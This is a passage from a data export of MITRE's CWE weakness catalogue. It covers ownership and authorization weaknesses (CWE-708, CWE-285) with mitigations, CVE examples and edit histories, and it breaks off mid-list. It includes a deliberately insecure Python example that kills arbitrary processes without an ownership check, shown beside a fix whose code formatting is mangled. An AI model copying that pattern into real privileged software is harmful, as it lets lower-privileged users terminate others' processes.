"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Relationship_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "282",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This function is part of a privileged program that takes input from users with potentially lower privileges.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef killProcess(processID):\n\t\tos.kill(processID, signal.SIGKILL)\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "This function remedies the problem by checking the owner of the process before killing it:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef killProcess(processID):\n\t\t\tuser = getCurrentUser()\n```\n#Check process owner against requesting user* \n\t\t\tif getProcessOwner(processID) == user:\n\t\t\t```\n\t\t\t\tos.kill(processID, signal.SIGKILL)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint(\"You cannot kill a process you don't own\")\n\t\t\t\treturn\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"282",
"283"
]
] |
[] |
708
|
Incorrect Ownership Assignment
|
Base
|
Simple
|
Incomplete
|
The product assigns an owner to a resource, but the owner is outside of the intended control sphere.
|
This may allow the resource to be manipulated by actors outside of the intended control sphere.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": "An attacker could read and modify data for which they do not have permissions to access directly.",
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Periodically review the privileges and their owners.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Policy"
],
"Strategy": null
},
{
"Description": "Use automated tools to check for privilege settings.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "File system sets wrong ownership and group when creating a new file.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-5101",
"Reference": "CVE-2007-5101"
},
{
"Description": "OS installs program with bin owner/group, allowing modification.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-4238",
"Reference": "CVE-2007-4238"
},
{
"Description": "Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-1716",
"Reference": "CVE-2007-1716"
},
{
"Description": "Backup software restores symbolic links with incorrect uid/gid.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-3148",
"Reference": "CVE-2005-3148"
},
{
"Description": "Product changes the ownership of files that a symlink points to, instead of the symlink itself.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1064",
"Reference": "CVE-2005-1064"
},
{
"Description": "Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2011-1551",
"Reference": "CVE-2011-1551"
}
] | null | null | null | null |
[
{
"Note": "\n\nThis overlaps verification errors, permissions, and privileges.\n\n\nA closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry.\n",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": "Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0.",
"SubmissionDate": "2008-09-09",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2008-09-09",
"SubmissionVersion": "1.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Maintenance_Notes, Other_Notes",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "282",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "345",
"Nature": "CanAlsoBe",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"282",
"708"
]
] |
[] |
285
|
Improper Authorization
|
Class
|
Simple
|
Draft
|
The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
|
Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.
When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Web Server",
"Prevalence": "Often",
"Type": "Technology"
},
{
"Class": null,
"Name": "Database Server",
"Prevalence": "Often",
"Type": "Technology"
}
] |
[
{
"Description": "\"AuthZ\" is typically used as an abbreviation of \"authorization\" within the web application security community. It is distinct from \"AuthN\" (or, sometimes, \"AuthC\") which is an abbreviation of \"authentication.\" The use of \"Auth\" as an abbreviation is discouraged, since it could be used for either authentication or authorization.",
"Term": "AuthZ"
}
] |
[
{
"Note": "\n\nREALIZATION: This weakness is caused during implementation of an architectural security tactic.\n\n\nA developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.\n",
"Phase": "Implementation"
},
{
"Note": "\n\nAuthorization weaknesses may arise when a single-user application is ported to a multi-user environment.\n",
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Modify Application Data",
"Modify Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.",
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "\n\nDivide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.\n\n\nNote that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.\n\n\nFor example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-4.4",
"Phase": [
"Architecture and Design"
],
"Strategy": "Libraries or Frameworks"
},
{
"Description": "\n\nFor web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.\n\n\nOne way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \"default deny\" policy when defining these ACLs.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration",
"Installation"
],
"Strategy": null
}
] |
[
{
"Description": "Go-based continuous deployment product does not check that a user has certain privileges to update or create an app, allowing adversaries to read sensitive repository information",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-24730",
"Reference": "CVE-2022-24730"
},
{
"Description": "Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3168",
"Reference": "CVE-2009-3168"
},
{
"Description": "Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2960",
"Reference": "CVE-2009-2960"
},
{
"Description": "Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3597",
"Reference": "CVE-2009-3597"
},
{
"Description": "Terminal server does not check authorization for guest access.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2282",
"Reference": "CVE-2009-2282"
},
{
"Description": "Database server does not use appropriate privileges for certain sensitive operations.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3230",
"Reference": "CVE-2009-3230"
},
{
"Description": "Gateway uses default \"Allow\" configuration for its authorization settings.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2213",
"Reference": "CVE-2009-2213"
},
{
"Description": "Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-0034",
"Reference": "CVE-2009-0034"
},
{
"Description": "Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-6123",
"Reference": "CVE-2008-6123"
},
{
"Description": "System monitoring software allows users to bypass authorization by creating custom forms.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-5027",
"Reference": "CVE-2008-5027"
},
{
"Description": "Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-7109",
"Reference": "CVE-2008-7109"
},
{
"Description": "Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-3424",
"Reference": "CVE-2008-3424"
},
{
"Description": "Content management system does not check access permissions for private files, allowing others to view those files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3781",
"Reference": "CVE-2009-3781"
},
{
"Description": "ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4577",
"Reference": "CVE-2008-4577"
},
{
"Description": "Product does not check the ACL of a page accessed using an \"include\" directive, allowing attackers to read unauthorized files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-6548",
